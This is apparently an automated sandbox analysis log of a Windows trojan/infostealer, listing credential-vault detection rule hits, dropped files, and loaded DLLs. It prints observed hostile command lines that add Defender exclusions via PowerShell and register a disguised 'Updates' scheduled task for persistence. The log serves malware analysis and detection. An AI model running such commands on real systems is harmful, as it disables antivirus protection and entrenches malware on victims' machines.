                    Source: jKqPSehspS.exe, 00000000.00000002.1538657428.0000000005A60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1539533176.00000000078A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000009.00000002.3942862074.0000000000F39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs jKqPSehspS.exe
                    Source: jKqPSehspS.exeBinary or memory string: OriginalFilenamejNDn.exe0 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: jKqPSehspS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: BLpvFR.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/2
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile created: C:\Users\user\AppData\Roaming\BLpvFR.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp89B.tmpJump to behavior
                    Source: jKqPSehspS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: jKqPSehspS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: jKqPSehspS.exeVirustotal: Detection: 79%
                    Source: jKqPSehspS.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile read: C:\Users\user\Desktop\jKqPSehspS.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BLpvFR.exe C:\Users\user\AppData\Roaming\BLpvFR.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
